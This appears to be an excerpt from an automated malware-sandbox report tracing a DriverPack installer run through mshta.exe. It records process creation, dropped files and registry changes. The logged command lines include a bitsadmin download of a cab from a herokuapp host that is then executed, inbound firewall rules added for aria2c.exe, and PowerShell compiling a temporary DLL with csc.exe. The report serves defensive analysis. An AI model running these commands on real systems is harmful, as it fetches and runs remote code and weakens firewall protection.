Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\start.bat" && echo %errorlevel% > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_runAsAdmin.txt
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\expand.exeFile opened: C:\Windows\LOGS\DPX\setuplog.cfg
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdater

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-48795 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_info.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /R /V "^$"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_8360.txt"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\user\AppData\Roaming\DRPSu\temp\run_command_84501.txt"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.cmdline

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab" | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\user\AppData\Local\Temp\dwnl_48795\log_bits_start.txt
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe bitsadmin /transfer dwnl-task-48795 /download /priority foreground http://dwrapper-dev.herokuapp.com/beetle-cab.cab "C:\Users\user\AppData\Local\Temp\dwnl_48795\dwnl_beetle-cab.cab"
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\92c6e2e1b8024b469ba59a029d8b5ccc.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\da26bf756ce0e246836f60c74d3d9c9b.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\devcon64.exeJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\0dd887da71734c28a6a6e75a968f9978$dpx$.tmp\7631337e95cef14bace29cbeb07a102c.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-7za.exeJump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.dllJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\aria2c.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack\Tools\driverpack-wget.exeJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\7zxa.dll (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe (copy)Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Microsoft-Windows-Diagnostics-Performance/Operational
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
